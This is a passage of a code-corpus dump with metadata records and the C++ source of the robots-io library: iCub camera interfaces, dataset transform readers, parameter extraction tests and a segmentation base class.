depth_file.write(depth_frame.astype('float32', order='C').tobytes())\n depth_file.close()\n\n print('received')\n\n break\n\nif __name__ == '__main__':\n main()\n"
},
{
"alpha_fraction": 0.688946008682251,
"alphanum_fraction": 0.6930591464042664,
"avg_line_length": 29.873016357421875,
"blob_id": "9dbd8c9ba99a221d84ab6ba91cf698b85592d3ce",
"content_id": "3d546a3b9de73668ca778eb3ac109463c6315bcd",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1945,
"license_type": "permissive",
"max_line_length": 418,
"num_lines": 63,
"path": "/src/RobotsIO/include/RobotsIO/Camera/iCubCameraRelative.h",
"repo_name": "xEnVrE/robots-io",
"src_encoding": "UTF-8",
"text": "/*\n * Copyright (C) 2019 Istituto Italiano di Tecnologia (IIT)\n *\n * This software may be modified and distributed under the terms of the\n * BSD 3-Clause license. See the accompanying LICENSE file for details.\n */\n\n#ifndef ROBOTSIO_ICUBCAMERARELATIVE_H\n#define ROBOTSIO_ICUBCAMERARELATIVE_H\n\n#include <RobotsIO/Camera/iCubCamera.h>\n\nnamespace RobotsIO {\n namespace Camera {\n class iCubCameraRelative;\n }\n}\n\n\nclass RobotsIO::Camera::iCubCameraRelative : public RobotsIO::Camera::iCubCamera\n{\npublic:\n\n iCubCameraRelative(const std::string& robot_name, const std::string& port_prefix, const bool& use_calibration = false, const std::string& calibration_path = \"\");\n\n iCubCameraRelative(const std::string& data_path_left, const std::string& data_path_right, const std::size_t& width, const std::size_t& height, const double& fx_l, const double& cx_l, const double& fy_l, const double& cy_l, const double& fx_r, const double& cx_r, const double& fy_r, const double& cy_r, const bool& load_encoders_data, const bool& use_calibration = false, const std::string& calibration_path = \"\");\n\n ~iCubCameraRelative();\n\n virtual bool status() const override;\n\n /**\n * RGB-D and pose.\n */\n\n std::pair<bool, Eigen::Transform<double, 3, Eigen::Affine>> pose(const bool& blocking) override;\n\n /**\n * Offline playback.\n */\n\n bool step_frame() override;\n\n bool set_frame_index(const std::int32_t& index) override;\n\nprotected:\n RobotsIO::Camera::iCubCamera& get_relative_camera();\n\n const RobotsIO::Camera::iCubCamera& get_relative_camera() const;\n\nprivate:\n /**\n * Log name to be used in messages printed by the class.\n */\n const std::string log_name_ = \"iCubCameraRelative\";\n\n /**\n * In offline mode, we need an additional instance to read data of both cameras.\n */\n std::unique_ptr<RobotsIO::Camera::iCubCamera> left_camera_;\n};\n\n#endif /* ROBOTSIO_ICUBCAMERARELATIVE_H */\n"
},
{
"alpha_fraction": 0.5529019236564636,
"alphanum_fraction": 0.5683102011680603,
"avg_line_length": 26.230770111083984,
"blob_id": "d77b26d0d872bd911fe2d143bcef482455664e1e",
"content_id": "9dd56d521f2db59db25e5820e86614f865c02daf",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 3894,
"license_type": "permissive",
"max_line_length": 124,
"num_lines": 143,
"path": "/src/RobotsIO/test/Utils/Parameters/main.cpp",
"repo_name": "xEnVrE/robots-io",
"src_encoding": "UTF-8",
"text": "/*\n * Copyright (C) 2019 Istituto Italiano di Tecnologia (IIT)\n *\n * This software may be modified and distributed under the terms of the\n * BSD 3-Clause license. See the accompanying LICENSE file for details.\n */\n\n#include <RobotsIO/Utils/Parameters.h>\n#include <RobotsIO/Utils/ParametersExtractor.h>\n\n#include <TestParameters.h>\n\n#include <cstdlib>\n#include <cmath>\n#include <iostream>\n#include <string>\n\nclass ExtractionTest : public RobotsIO::Utils::ParametersExtractor\n{\npublic:\n ExtractionTest(const RobotsIO::Utils::Parameters& parameters) :\n RobotsIO::Utils::ParametersExtractor(parameters)\n { }\n\n bool test()\n {\n /* Perform extraction */\n extract_fields();\n\n /* Check extraction correctness */\n bool ok = true;\n if (field0_ != -1)\n {\n std::cerr << \"Expected field_0 to be -1, instead it is \" << field0_ << std::endl;\n ok = false;\n }\n if (field1_ != M_PI)\n {\n std::cerr << \"Expected field_1 to be M_PI, instead it is \" << field1_ << std::endl;\n ok = false;\n }\n if (field2_ != true)\n {\n std::cerr << \"Expected field_2 to be true, instead it is \" << (field2_ ? \"true\" : \"false\") << std::endl;\n ok = false;\n }\n if (field3_ != \"This is a string.\")\n {\n std::cerr << \"Expected field_3 to be 'This is a string.', instead it is \" << field3_ << std::endl;\n ok = false;\n }\n if (field4_ != 1)\n {\n std::cerr << \"Expected field_4 to be 1, instead it is \" << field4_ << std::endl;\n ok = false;\n }\n\n return ok;\n }\n\n void extract_field(const std::string& key, const int& value) override\n {\n field0_ = value;\n }\n\n void extract_field(const std::string& key, const double& value) override\n {\n field1_ = value;\n }\n\n void extract_field(const std::string& key, const bool& value) override\n {\n field2_ = value;\n }\n\n void extract_field(const std::string& key, const std::string& value) override\n {\n field3_ = value;\n }\n\n void extract_field(const std::string& key, const std::size_t& value) override\n {\n field4_ = value;\n }\n\nprivate:\n int field0_;\n\n double field1_;\n\n bool field2_;\n\n std::string field3_;\n\n std::size_t field4_;\n};\n\n\nint main(int argc, char** argv)\n{\n TestParameters parameters;\n\n std::cout << \"Setting parameters.\" << std::endl;\n parameters.field0(-1);\n parameters.field1(M_PI);\n parameters.field2(true);\n parameters.field3(\"This is a string.\");\n parameters.field4(1);\n\n std::cout << \"Testing parameters using named accessors.\" << std::endl;\n if (parameters.field0() != -1)\n {\n std::cerr << \"Expected field_0 to be -1, instead it is \" << parameters.field0() << std::endl;\n return EXIT_FAILURE;\n }\n if (parameters.field1() != M_PI)\n {\n std::cerr << \"Expected field_1 to be M_PI, instead it is \" << parameters.field1() << std::endl;\n return EXIT_FAILURE;\n }\n if (parameters.field2() != true)\n {\n std::cerr << \"Expected field_2 to be true, instead it is \" << (parameters.field2() ? \"true\" : \"false\") << std::endl;\n return EXIT_FAILURE;\n }\n if (parameters.field3() != \"This is a string.\")\n {\n std::cerr << \"Expected field_3 to be 'This is a string.', instead it is \" << parameters.field3() << std::endl;\n return EXIT_FAILURE;\n }\n if (parameters.field4() != 1)\n {\n std::cerr << \"Expected field_4 to be 1, instead it is \" << parameters.field4() << std::endl;\n return EXIT_FAILURE;\n }\n\n std::cout << \"Testing parameters using extractor.\" << std::endl;\n ExtractionTest extraction_test(parameters);\n if (!(extraction_test.test()))\n return EXIT_FAILURE;\n\n return EXIT_SUCCESS;\n}\n"
},
{
"alpha_fraction": 0.6612008213996887,
"alphanum_fraction": 0.6637235283851624,
"avg_line_length": 23.319019317626953,
"blob_id": "8743f5a4bca39fb828bb25934edf8d7b7be740ec",
"content_id": "46552b9f60d334165d0975a2a669d64bbf50b976",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 3964,
"license_type": "permissive",
"max_line_length": 312,
"num_lines": 163,
"path": "/src/RobotsIO/include/RobotsIO/Camera/iCubCamera.h",
"repo_name": "xEnVrE/robots-io",
"src_encoding": "UTF-8",
"text": "/*\n * Copyright (C) 2019 Istituto Italiano di Tecnologia (IIT)\n *\n * This software may be modified and distributed under the terms of the\n * BSD 3-Clause license. See the accompanying LICENSE file for details.\n */\n\n#ifndef ROBOTSIO_ICUBCAMERA_H\n#define ROBOTSIO_ICUBCAMERA_H\n\n#include <RobotsIO/Camera/Camera.h>\n\n#include <Eigen/Dense>\n\n#include <iCub/iKin/iKinFwd.h>\n#include <iCub/learningMachine/LSSVMLearner.h>\n\n#include <opencv2/opencv.hpp>\n\n#include <string>\n\n#include <yarp/dev/GazeControl.h>\n#include <yarp/dev/IEncoders.h>\n#include <yarp/dev/PolyDriver.h>\n#include <yarp/os/Bottle.h>\n#include <yarp/os/BufferedPort.h>\n#include <yarp/os/Network.h>\n#include <yarp/sig/Image.h>\n\nnamespace RobotsIO {\n namespace Camera {\n class iCubCamera;\n }\n}\n\n\nclass RobotsIO::Camera::iCubCamera : public RobotsIO::Camera::Camera\n{\npublic:\n\n iCubCamera(const std::string& robot_name, const std::string& laterality, const std::string& port_prefix, const bool& use_calibration = false, const std::string& calibration_path = \"\");\n\n iCubCamera(const std::string& data_path, const std::string& laterality, const std::size_t& width, const std::size_t& height, const double& fx, const double& cx, const double& fy, const double& cy, const bool& load_encoders_data, const bool& use_calibration = false, const std::string& calibration_path = \"\");\n\n ~iCubCamera();\n\n /**\n * Gaze control interface.\n */\n\n bool is_controller_available();\n\n yarp::dev::IGazeControl& controller();\n\n /**\n * RGB-D and pose.\n */\n\n std::pair<bool, Eigen::MatrixXf> depth(const bool& blocking) override;\n\n std::pair<bool, Eigen::Transform<double, 3, Eigen::Affine>> pose(const bool& blocking) override;\n\n std::pair<bool, cv::Mat> rgb(const bool& blocking) override;\n\n std::pair<bool, double> time_stamp_rgb() const override;\n\n std::pair<bool, double> time_stamp_depth() const override;\n\n /**\n * Auxiliary data.\n */\n\n std::pair<bool, Eigen::VectorXd> auxiliary_data(const bool& blocking) override;\n\n std::size_t auxiliary_data_size() const override;\n\nprotected:\n std::string laterality();\n\n std::pair<bool, Eigen::Transform<double, 3, Eigen::Affine>> laterality_pose(const std::string& laterality, const bool& blocking);\n\n void set_laterality(const std::string& laterality);\n\nprivate:\n std::string laterality_;\n\n yarp::os::Network yarp_;\n\n /**\n * RGB-D sources.\n */\n\n yarp::os::BufferedPort<yarp::sig::ImageOf<yarp::sig::PixelFloat>> port_depth_;\n\n yarp::os::BufferedPort<yarp::sig::ImageOf<yarp::sig::PixelRgb>> port_rgb_;\n\n /**\n * Drivers.\n */\n\n /* Gateway to iGazeControl::getLeftEyePose() and iGazeControl::getRightEyePose(). */\n bool getLateralityEyePose(const std::string& laterality, yarp::sig::Vector& position, yarp::sig::Vector& orientation);\n\n yarp::dev::PolyDriver driver_gaze_;\n\n yarp::dev::IGazeControl* gaze_control_;\n\n bool use_driver_gaze_ = true;\n\n /**\n * Fallback interface with encoders.\n */\n\n yarp::dev::PolyDriver drv_torso_;\n\n yarp::dev::IEncoders *itorso_;\n\n yarp::dev::PolyDriver drv_head_;\n\n yarp::dev::IEncoders *ihead_;\n\n iCub::iKin::iCubEye left_eye_kinematics_;\n\n iCub::iKin::iCubEye right_eye_kinematics_;\n\n /*\n * Extrinsic calibration.\n */\n\n Eigen::Transform<double, 3, Eigen::Affine> exp_map(const Eigen::VectorXd& se3);\n\n bool load_calibration_model(const std::string& model_path);\n\n bool use_calibration_ = false;\n\n iCub::learningmachine::LSSVMLearner calibration_;\n\n /*\n * Offline playback.\n */\n\n bool load_encoders_data_ = false;\n\n /**\n * Timestamp.\n */\n\n double time_stamp_rgb_;\n\n double time_stamp_depth_;\n\n bool is_time_stamp_rgb_ = false;\n\n bool is_time_stamp_depth_ = false;\n\n /**\n * Log name to be used in messages printed by the class.\n */\n\n const std::string log_name_ = \"iCubCamera\";\n};\n\n#endif /* ROBOTSIO_ICUBCAMERA_H */\n"
},
{
"alpha_fraction": 0.5820433497428894,
"alphanum_fraction": 0.5882353186607361,
"avg_line_length": 25.547945022583008,
"blob_id": "42ff88aa5351df6b7fe29eb323d04ab50e7bb860",
"content_id": "9d5a6909851f00c505cd028c1c0a7d7fd3574c57",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1938,
"license_type": "permissive",
"max_line_length": 115,
"num_lines": 73,
"path": "/src/RobotsIO/test/test_DatasetTransform/main.cpp",
"repo_name": "xEnVrE/robots-io",
"src_encoding": "UTF-8",
"text": "/*\n * Copyright (C) 2020 Istituto Italiano di Tecnologia (IIT)\n *\n * This software may be modified and distributed under the terms of the\n * BSD 3-Clause license. See the accompanying LICENSE file for details.\n */\n\n#include <cstdlib>\n#include <iostream>\n\n#include <RobotsIO/Utils/DatasetTransform.h>\n\nusing namespace Eigen;\nusing namespace RobotsIO::Utils;\n\n\nbool parse_size_t (char** argv, const std::size_t& index, const std::string& name, std::size_t& retrieved);\n\n\nint main(int argc, char** argv)\n{\n const std::string log_name = \"test_DatasetTransform\";\n\n if (argc != 4)\n {\n std::cerr << \"Synopsis: \" + log_name + \" <dataset_path> <skip_rows> <skip_cols>\" << std::endl << std::endl;\n\n return EXIT_FAILURE;\n }\n\n const std::string dataset_path{argv[1]};\n\n std::size_t skip_rows;\n if (!parse_size_t(argv, 2, \"skip_rows\", skip_rows))\n return EXIT_FAILURE;\n\n std::size_t skip_cols;\n if (!parse_size_t(argv, 3, \"skip_cols\", skip_cols))\n return EXIT_FAILURE;\n\n DatasetTransform dataset(dataset_path, skip_rows, skip_cols, 7);\n\n std::size_t i = 0;\n while (dataset.freeze())\n {\n auto transform = dataset.transform();\n auto rotation = AngleAxisd(transform.rotation());\n std::cout << i++ << \": \"\n << transform.translation().transpose() << \" \"\n << rotation.axis().transpose() << \" \" << rotation.angle()\n << std::endl;\n }\n\n return EXIT_SUCCESS;\n}\n\n\nbool parse_size_t (char** argv, const std::size_t& index, const std::string& name, std::size_t& retrieved)\n{\n try\n {\n if (std::stoi(argv[index]) < 0)\n throw(std::invalid_argument(\"\"));\n retrieved = std::stoul(argv[index]);\n }\n catch (std::invalid_argument)\n {\n std::cerr << \"Invalid value \" << argv[index] << \" for parameter <\" << name << \">.\" << std::endl;\n return false;\n }\n\n return true;\n}\n"
},
{
"alpha_fraction": 0.6583783626556396,
"alphanum_fraction": 0.6648648381233215,
"avg_line_length": 23.342105865478516,
"blob_id": "a47c7a86dbe05441df040e75d2d1a5a4cf16d089",
"content_id": "3196cdb16928ee1b74b18ac68f508cb5f105e22a",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 925,
"license_type": "permissive",
"max_line_length": 125,
"num_lines": 38,
"path": "/src/RobotsIO/src/Utils/ImageFileProbe.cpp",
"repo_name": "xEnVrE/robots-io",
"src_encoding": "UTF-8",
"text": "/*\n * Copyright (C) 2020 Istituto Italiano di Tecnologia (IIT)\n *\n * This software may be modified and distributed under the terms of the\n * BSD 3-Clause license. See the accompanying LICENSE file for details.\n */\n\n#include <RobotsIO/Utils/ImageFileProbe.h>\n\n#include <opencv2/opencv.hpp>\n\nusing namespace RobotsIO::Utils;\n\n\nImageFileProbe::ImageFileProbe(const std::string& output_path, const std::string& prefix, const std::string& output_format) :\n output_prefix_(output_path),\n output_format_(output_format)\n{\n if (output_prefix_.back() != '/')\n output_prefix_ += '/';\n\n if (!prefix.empty())\n output_prefix_ += (prefix + \"_\");\n}\n\n\nImageFileProbe::~ImageFileProbe()\n{}\n\n\nvoid ImageFileProbe::on_new_data()\n{\n data_cv_ = RobotsIO::Utils::any_cast<cv::Mat>(get_data());\n\n cv::imwrite(output_prefix_ + std::to_string(frame_counter_) + \".\" + output_format_, data_cv_);\n\n frame_counter_++;\n}\n"
},
{
"alpha_fraction": 0.71987384557724,
"alphanum_fraction": 0.7242901921272278,
"avg_line_length": 31.346939086914062,
"blob_id": "a9b177d2f53b5e288cedf824063cc9e6519d837e",
"content_id": "12528a4319932ac474cac9608b71dd7d2fd60dcd",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1585,
"license_type": "permissive",
"max_line_length": 390,
"num_lines": 49,
"path": "/src/RobotsIO/include/RobotsIO/Utils/DatasetTransformDelayed.h",
"repo_name": "xEnVrE/robots-io",
"src_encoding": "UTF-8",
"text": "/*\n * Copyright (C) 2020 Istituto Italiano di Tecnologia (IIT)\nNN *\n * This software may be modified and distributed under the terms of the\n * BSD 3-Clause license. See the accompanying LICENSE file for details.\n */\n\n#ifndef ROBOTSIO_DATASETTRANSFORMDELAYED_H\n#define ROBOTSIO_DATASETTRANSFORMDELAYED_H\n\n#include <Eigen/Dense>\n\n#include <RobotsIO/Utils/DatasetDataStreamDelayed.h>\n#include <RobotsIO/Utils/Transform.h>\n\nnamespace RobotsIO {\n namespace Utils {\n class DatasetTransformDelayed;\n }\n}\n\n\nclass RobotsIO::Utils::DatasetTransformDelayed : public RobotsIO::Utils::DatasetDataStreamDelayed,\n public RobotsIO::Utils::Transform\n{\npublic:\n EIGEN_MAKE_ALIGNED_OPERATOR_NEW\n\n DatasetTransformDelayed(const double& fps, const double& simulated_fps, const bool simulate_inference_time, const std::string& file_path, const std::size_t& skip_rows, const std::size_t& skip_cols, const std::size_t& expected_cols, const int rx_time_index = RobotsIO::Utils::DatasetDataStream::NoTimeIndex, const int tx_time_index = RobotsIO::Utils::DatasetDataStream::NoTimeIndex);\n\n virtual ~DatasetTransformDelayed();\n\n Eigen::Transform<double, 3, Eigen::Affine> transform() override;\n\n bool freeze(const bool blocking = false) override;\n\n int get_frames_between_iterations() const override;\n\nprivate:\n Eigen::Transform<double, 3, Eigen::Affine> transform_;\n\n double fps_;\n\n double simulated_fps_;\n\n const std::string log_name_ = \"DatasetTransformDelayed\";\n};\n\n#endif /* ROBOTSIO_DATASETTRANSFORMDELAYED_H */\n"
},
{
"alpha_fraction": 0.6870748400688171,
"alphanum_fraction": 0.6938775777816772,
"avg_line_length": 16.926828384399414,
"blob_id": "12151338ca5eb7a905b61b4f3cc2e8ea6a2cd373",
"content_id": "768307f69f8fbd26922091327497795ec0c90037",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 735,
"license_type": "permissive",
"max_line_length": 71,
"num_lines": 41,
"path": "/src/RobotsIO/src/Utils/ClockedComponent.cpp",
"repo_name": "xEnVrE/robots-io",
"src_encoding": "UTF-8",
"text": "/*\n * Copyright (C) 2020 Istituto Italiano di Tecnologia (IIT)\n *\n * This software may be modified and distributed under the terms of the\n * BSD 3-Clause license. See the accompanying LICENSE file for details.\n */\n\n#include <RobotsIO/Utils/ClockedComponent.h>\n\nusing namespace RobotsIO::Utils;\n\n\nClockedComponent::ClockedComponent()\n{\n /* Initialize default clock. */\n clock_ = std::make_shared<Clock>();\n}\n\n\nvoid ClockedComponent::start_count()\n{\n current_time_ = clock_->now();\n}\n\n\ndouble ClockedComponent::stop_count() const\n{\n return clock_->now() - current_time_;\n}\n\n\nClock& ClockedComponent::clock()\n{\n return *clock_;\n}\n\n\nvoid ClockedComponent::replace_clock(std::shared_ptr<Clock> clock)\n{\n clock_ = clock;\n}\n"
},
{
"alpha_fraction": 0.7170329689979553,
"alphanum_fraction": 0.723901093006134,
"avg_line_length": 22.483871459960938,
"blob_id": "94e3c2af023d0472b65257223d9d0872332b0b67",
"content_id": "fb08fc0cdf7db7cee8d7c8466e8f77716c7e7d95",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 728,
"license_type": "permissive",
"max_line_length": 89,
"num_lines": 31,
"path": "/src/RobotsIO/src/Utils/ParametersExtractor.cpp",
"repo_name": "xEnVrE/robots-io",
"src_encoding": "UTF-8",
"text": "/*\n * Copyright (C) 2019 Istituto Italiano di Tecnologia (IIT)\n *\n * This software may be modified and distributed under the terms of the\n * BSD 3-Clause license. See the accompanying LICENSE file for details.\n */\n\n#include <RobotsIO/Utils/ParametersExtractor.h>\n#include <RobotsIO/Utils/Parameters.h>\n\nusing namespace RobotsIO::Utils;\n\n\nParametersExtractor::ParametersExtractor(const RobotsIO::Utils::Parameters& parameters) :\n parameters_(parameters)\n{ }\n\n\nvoid ParametersExtractor::extract_fields()\n{\n for (const auto& key : parameters_.keys())\n {\n parameters_.extract_field(key, *this);\n }\n}\n\n\nvoid ParametersExtractor::extract_field(const std::string& key)\n{\n parameters_.extract_field(key, *this);\n}\n"
},
{
"alpha_fraction": 0.7279693484306335,
"alphanum_fraction": 0.7394636273384094,
"avg_line_length": 26,
"blob_id": "aacedb8a13900cc34be6dc26e2e5efd7635ba0e7",
"content_id": "2d0cb07cf506cfcecf426f773f8021c4a130fee3",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 783,
"license_type": "permissive",
"max_line_length": 86,
"num_lines": 29,
"path": "/src/RobotsIO/src/Utils/YarpBottleProbe.cpp",
"repo_name": "xEnVrE/robots-io",
"src_encoding": "UTF-8",
"text": "/*\n * Copyright (C) 2019 Istituto Italiano di Tecnologia (IIT)\n *\n * This software may be modified and distributed under the terms of the\n * BSD 3-Clause license. See the accompanying LICENSE file for details.\n */\n\n#include <RobotsIO/Utils/Parameters2YarpBottle.h>\n#include <RobotsIO/Utils/YarpBottleProbe.hpp>\n\nusing namespace RobotsIO::Utils;\nusing namespace yarp::os;\n\n\ntemplate <>\nvoid RobotsIO::Utils::YarpBottleProbe<RobotsIO::Utils::Parameters>::on_new_data()\n{\n data_ = convert_from(*(RobotsIO::Utils::any_cast<const Parameters*>(get_data())));\n\n this->send_data(data_);\n}\n\n\ntemplate <>\nBottle YarpBottleProbe<Parameters>::convert_from(const Parameters& data)\n{\n Parameters2YarpBottle parameters_2_bottle(data);\n return parameters_2_bottle.extract_to_bottle();\n}\n"
},
{
"alpha_fraction": 0.6906625032424927,
"alphanum_fraction": 0.6937924027442932,
"avg_line_length": 23.576923370361328,
"blob_id": "7ef1b2fef14258da178c39f119307eadd7d00067",
"content_id": "7793916137e1e3cf9e822a99e70adc062784861d",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1917,
"license_type": "permissive",
"max_line_length": 101,
"num_lines": 78,
"path": "/src/RobotsIO/src/Camera/DatasetCamera.cpp",
"repo_name": "xEnVrE/robots-io",
"src_encoding": "UTF-8",
"text": "/*\n * Copyright (C) 2019 Istituto Italiano di Tecnologia (IIT)\n *\n * This software may be modified and distributed under the terms of the\n * BSD 3-Clause license. See the accompanying LICENSE file for details.\n */\n\n#include <RobotsIO/Camera/DatasetCamera.h>\n\nusing namespace RobotsIO::Camera;\n\n\nDatasetCamera::DatasetCamera\n(\n const std::string& data_path,\n const std::string& data_prefix,\n const std::string& rgb_prefix,\n const std::string& depth_prefix,\n const std::string& data_format,\n const std::string& rgb_format,\n const std::string& depth_format,\n const std::size_t& heading_zeros,\n const std::size_t& index_offset,\n const std::size_t& width,\n const double& height,\n const double& fx,\n const double& cx,\n const double& fy,\n const double& cy\n) :\n Camera(data_path, width, height, fx, cx, fy, cy)\n{\n /* Set dataset parameters. */\n dataset_parameters_.data_prefix(data_prefix);\n dataset_parameters_.rgb_prefix(rgb_prefix);\n dataset_parameters_.depth_prefix(depth_prefix);\n dataset_parameters_.data_format(data_format);\n dataset_parameters_.rgb_format(rgb_format);\n dataset_parameters_.depth_format(depth_format);\n dataset_parameters_.heading_zeros(heading_zeros);\n dataset_parameters_.index_offset(index_offset);\n\n Camera::initialize();\n}\n\n\nDatasetCamera::~DatasetCamera()\n{ }\n\n\nstd::pair<bool, Eigen::MatrixXf> DatasetCamera::depth(const bool& blocking)\n{\n return depth_offline();\n}\n\n\nstd::pair<bool, Eigen::Transform<double, 3, Eigen::Affine>> DatasetCamera::pose(const bool& blocking)\n{\n return pose_offline();\n}\n\n\nstd::pair<bool, cv::Mat> DatasetCamera::rgb(const bool& blocking)\n{\n return rgb_offline();\n}\n\n\nstd::pair<bool, double> DatasetCamera::time_stamp_rgb() const\n{\n return time_stamp_rgb_offline();\n}\n\n\nstd::pair<bool, double> DatasetCamera::time_stamp_depth() const\n{\n return time_stamp_depth_offline();\n}\n"
},
{
"alpha_fraction": 0.7095056772232056,
"alphanum_fraction": 0.7148289084434509,
"avg_line_length": 29.581396102905273,
"blob_id": "473a54e4dc0c868727f226b22c924c391e90f753",
"content_id": "4345f4ca46dc3dfe20cf5c20c6d4af896fb539ae",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1315,
"license_type": "permissive",
"max_line_length": 295,
"num_lines": 43,
"path": "/src/RobotsIO/include/RobotsIO/Utils/DatasetTransform.h",
"repo_name": "xEnVrE/robots-io",
"src_encoding": "UTF-8",
"text": "/*\n * Copyright (C) 2020 Istituto Italiano di Tecnologia (IIT)\n *\n * This software may be modified and distributed under the terms of the\n * BSD 3-Clause license. See the accompanying LICENSE file for details.\n */\n\n#ifndef ROBOTSIO_DATASETTRANSFORM_H\n#define ROBOTSIO_DATASETTRANSFORM_H\n\n#include <Eigen/Dense>\n\n#include <RobotsIO/Utils/DatasetDataStream.h>\n#include <RobotsIO/Utils/Transform.h>\n\nnamespace RobotsIO {\n namespace Utils {\n class DatasetTransform;\n }\n}\n\n\nclass RobotsIO::Utils::DatasetTransform : public RobotsIO::Utils::DatasetDataStream,\n public RobotsIO::Utils::Transform\n{\npublic:\n EIGEN_MAKE_ALIGNED_OPERATOR_NEW\n\n DatasetTransform(const std::string& file_path, const std::size_t& skip_rows, const std::size_t& skip_cols, const std::size_t& expected_cols, const int rx_time_index = RobotsIO::Utils::DatasetDataStream::NoTimeIndex, const int tx_time_index = RobotsIO::Utils::DatasetDataStream::NoTimeIndex);\n\n virtual ~DatasetTransform();\n\n Eigen::Transform<double, 3, Eigen::Affine> transform() override;\n\n bool freeze(const bool blocking = false) override;\n\nprivate:\n Eigen::Transform<double, 3, Eigen::Affine> transform_;\n\n const std::string log_name_ = \"DatasetTransform\";\n};\n\n#endif /* ROBOTSIO_DATASETTRANSFORM_H */\n"
},
{
"alpha_fraction": 0.6663390398025513,
"alphanum_fraction": 0.6727272868156433,
"avg_line_length": 25.428571701049805,
"blob_id": "d97e54aac7aaa5f4328764b6fc670b5bdbbeccd9",
"content_id": "aabb5ef2b0f326d172095f48754091cd4389436b",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 2035,
"license_type": "permissive",
"max_line_length": 110,
"num_lines": 77,
"path": "/src/RobotsIO/include/RobotsIO/Utils/Segmentation.h",
"repo_name": "xEnVrE/robots-io",
"src_encoding": "UTF-8",
"text": "/*\n * Copyright (C) 2021 Istituto Italiano di Tecnologia (IIT)\n *\n * This software may be modified and distributed under the terms of the\n * BSD 3-Clause license. See the accompanying LICENSE file for details.\n */\n\n#ifndef ROBOTSIO_SEGMENTATION_H\n#define ROBOTSIO_SEGMENTATION_H\n\n#include <opencv2/opencv.hpp>\n\n#include <string>\n\nnamespace RobotsIO {\n namespace Utils {\n class Segmentation;\n }\n}\n\n\nclass RobotsIO::Utils::Segmentation\n{\npublic:\n\n virtual ~Segmentation();\n\n virtual bool reset();\n\n virtual bool step_frame();\n\n virtual bool is_stepping_required() const = 0;\n\n virtual void reset_data_loading_time();\n\n virtual double get_data_loading_time() const;\n\n /**\n * N > 1 indicates that the segmentation is available every N frames\n * N = 1 indicates that the segmentation is available at all frames\n * N < 1 indicates that this information is not available\n *\n * By default, this method returns N = 1. User might override this setting by re-implementing this method.\n */\n virtual int get_frames_between_iterations() const;\n\n /**\n * Provide a new segmentation mask.\n */\n virtual std::pair<bool, cv::Mat> segmentation(const bool& blocking) = 0;\n\n /**\n * Provide the latest valid segmentation mask that has been received.\n *\n * By default, this return (false, cv::Mat()). User might override this method if required.\n */\n virtual std::pair<bool, cv::Mat> latest_segmentation();\n\n /**\n * Provide the timestamp of the latest valid segmentation that has been received.\n *\n * By default, this return -1. User might override this method if required.\n */\n virtual double get_time_stamp();\n\n /**\n * If required, the user might override this method to set the RGB image\n * on which the segmentation has to be evaluated.\n */\n virtual void set_rgb_image(const cv::Mat& image, const double& timestamp);\n\nprivate:\n\n const std::string log_name_ = \"Segmentation\";\n};\n\n#endif /* ROBOTSIO_SEGMENTATION_H */\n"
},
{
"alpha_fraction": 0.7407912611961365,
"alphanum_fraction": 0.7476125359535217,
"avg_line_length": 29.54166603088379,
"blob_id": "5ad8af7f49eff8bcf78d1b8c2801c524829262f2",
"content_id": "b57760c960df41d206426318c9034980fa6686ef",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 733,
"license_type": "permissive",
"max_line_length": 169,
"num_lines": 24,
"path": "/src/RobotsIO/include/RobotsIO/Camera/CameraDeprojectionMatrix.h",
"repo_name": "xEnVrE/robots-io",
"src_encoding": "UTF-8",
"text": "/*\n * Copyright (C) 2020 Istituto Italiano di Tecnologia (IIT)\n *\n * This software may be modified and distributed under the terms of the\n * BSD 3-Clause license. See the accompanying LICENSE file for details.\n */\n\n#ifndef ROBOTSIO_CAMERADEPROJECTIONMATRIX_H\n#define ROBOTSIO_CAMERADEPROJECTIONMATRIX_H\n\n#include \"RobotsIO/Camera/CameraParameters.h\"\n#include <RobotsIO/Camera/CameraParameters.h>\n\n#include <Eigen/Dense>\n\nnamespace RobotsIO {\n namespace Camera {\n Eigen::MatrixXd deprojection_matrix(const std::size_t& width, const std::size_t& height, const double& fx, const double& fy, const double& cx, const double& cy);\n\n Eigen::MatrixXd deprojection_matrix(const CameraParameters& parameters);\n }\n}\n\n#endif\n"
},
{
"alpha_fraction": 0.6322751045227051,
"alphanum_fraction": 0.6446208357810974,
"avg_line_length": 29.648649215698242,
"blob_id": "56abb47e4dc33697e96c4bdba3c1f8fa79e3af01",
"content_id": "553aba79723f634b04f58b44631a65d548fb4f6f",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1134,
"license_type": "permissive",
"max_line_length": 171,
"num_lines": 37,
"path": "/src/RobotsIO/src/Camera/CameraDeprojectionMatrix.cpp",
"repo_name": "xEnVrE/robots-io",
"src_encoding": "UTF-8",
